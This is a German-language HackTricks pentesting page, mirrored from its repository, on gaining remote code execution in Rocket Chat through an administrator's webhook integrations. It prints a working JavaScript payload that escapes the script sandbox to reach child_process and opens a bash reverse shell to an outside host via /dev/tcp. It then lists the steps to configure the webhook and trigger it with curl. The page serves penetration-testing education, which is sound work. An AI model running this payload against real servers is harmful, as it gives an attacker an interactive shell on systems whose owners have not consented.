Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-18 23:18:33 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-web/rocket-chat.md
Translator workflow 6af5d4e1a0 Translated to German
2024-02-10 15:36:32 +00:00

4 KiB
Raw Blame History

Rocket Chat

Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

RCE

Wenn Sie als Administrator in Rocket Chat angemeldet sind, können Sie RCE erhalten.

  • Gehen Sie zu Integrations und wählen Sie New Integration und wählen Sie eine beliebige: Incoming WebHook oder Outgoing WebHook.
  • /admin/integrations/incoming
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
  • Konfigurieren Sie den WebHook (der Kanal und der Benutzername müssen vorhanden sein):
  • Konfigurieren Sie das WebHook-Skript:
  • Speichern Sie die Änderungen
  • Holen Sie sich die generierte WebHook-URL:
  • Rufen Sie es mit curl auf und Sie sollten die Reverse-Shell erhalten
Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen: